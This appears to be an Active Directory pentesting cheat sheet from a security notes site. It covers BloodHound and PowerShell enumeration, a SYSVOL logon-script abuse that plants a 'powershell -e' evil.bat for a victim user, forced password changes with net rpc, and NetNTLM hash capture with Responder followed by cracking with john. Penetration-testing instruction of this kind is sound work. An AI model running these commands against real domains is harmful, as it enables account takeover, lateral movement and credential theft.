Active Directory Pentesting

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.

Enumeration

Domain Controllers Discovery

dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25

Enumeration with BloodHound

1. Run BloodHound

We use BloodHound Community Edition. The following command starts the Docker Compose of the BloodHound.

curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # If you want to reset the password of BloodHound...
sudo docker-compose pull && sudo docker-compose up

After that, we can use the web UI by accessing to localhost:8080 in web browser. Login with the username admin and the password which is displayed the log when executing the above command.

To specify arbitrary ip and port, set the environment variables on our attack machine:

export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090

2. Collect Data

Option1. Using NetExec

If you already have NetExec in your machine, I think it is the most easiest way.

netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All

Option2. Using BloodHound.py

We can also use BloodHound.py. Install it as follow:

python3 -m venv .venv
source .venv/bin/activate
pipx install bloodhound # or using 'pip3' instead of 'pipx'
bloodhound-python -h

Then collect data:

# -d: Domain
# -u: Username
# -p: Password
# -dc: Domain Controller
# -c all: Collect all data
# -ns: Alternate the nameserver
bloodhound-python -d example.local -u username -p password -dc dc.example.local -c all -ns ns.example.local

# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>

3. Upload Collected Data

After running, the result files (*.json) generated in the current directory. Upload all these JSON files to the BloodHound in web browser.

We can explore the relationship in the Active Directory.

Investigation

# List all users
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

# List all groups
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com

# List the password policy
net accounts /domain

# List AD objects
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

# Retrieve information about the given domain.
Get-ADDomain -Server dc.example.com

# Change the password of AD user
Set-ADAccountPassword -Identity <username> -Server dc.example.com  -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)

# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\dc.example.com\SYSVOL\

Abuse Logon Script for Other Users

If the current user has the permission to write scripts in SYSVOL, we may be able to change other users logon script path.

# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\

# 2. Modify/Add a malicious script
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat

# 3. Set logon script for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat

When the other user logs on, the .bat script will be executed.

Force Change Password Attack

If we found some username/password, and other usernames, we might be able to change other user passwords. The user needs to have GenericAll permission to change passwords of other users.

# -U: User credential who has the permission to change another user password
# -I: Target IP
# -S: Target server name
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"

Microsoft Management Console (mmc)

To setup AD, follow this instructions:

Right-click on the Windows icon.
Click "Run" and enter "mmc" then click "OK".
In the MMC, click "File → Add or Remove Snap-ins".
Add all three "Active Directory…" snap-ins.
Right-click on the "Active Directory…" in the left pane and select "Change Forest".
Enter the domain as the Root domain and click OK.
Click on "View → Advanced Features".

Naming Convention

If we found usernames list in Active Directory, we can modify usernames with naming convention. For instance,

john smith   -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole

ssh dc.example.com\\<ad_username>@sub.dc.example.com

Inject Credentials into Memory

# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe

DNS Configuration

# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

Now check if the configuration is set correctly.

nslookup dc.example.com

Basic Knowledge

User Management

Delegation
In Active Directory, the administrator delegate another user to manage users over an Organizational Unit (OU), without the admin privileges.
1. Setup
  1. Open "Active Directory Users and Computers".
  2. Right-click on the target OU, and click “Deligate Control…”. Then the new window will open.
  3. In the window, input username who you want to delegate the privilege that manage users.
  4. Select tasks to which the delegated user should manage.
  5. Click OK.
2. Manage Users
  1. Logon as the delegated user.
  2. For instance, if you want to reset the john's password, execute the following command in PowerShell. Then input new password in prompt.
    Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
  3. The first time John logs on after that, we want John to change his arbitrary password not the password you entered. So that to, execute the following command.
    Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
  4. Now when John logs on he will be prompt to change a new password.

Intercept NetNTLM Authentication

Start Responder to listen for any LLMNR, NBT-NS, WPAD requests.

sudo responder -I <interface-like-eth0>

Leave Responder running until receiving some requests. If you get NTLM hash, crack it in local machine.

echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt

References

PreviousOneDrive Logs NextAD CS (Active Directory Certificate Services) Pentesting

Last updated 1 month ago

hashtagEnumeration

hashtagDomain Controllers Discovery

hashtagEnumeration with BloodHound

hashtag1. Run BloodHound

hashtag2. Collect Data

hashtag3. Upload Collected Data

hashtagInvestigation

hashtagAbuse Logon Script for Other Users

hashtagForce Change Password Attack

hashtagMicrosoft Management Console (mmc)

hashtagNaming Convention

hashtagSSH Login with AD Credentials

hashtagInject Credentials into Memory

hashtagDNS Configuration

hashtagBasic Knowledge

hashtagUser Management

hashtagIntercept NetNTLM Authentication

hashtagReferences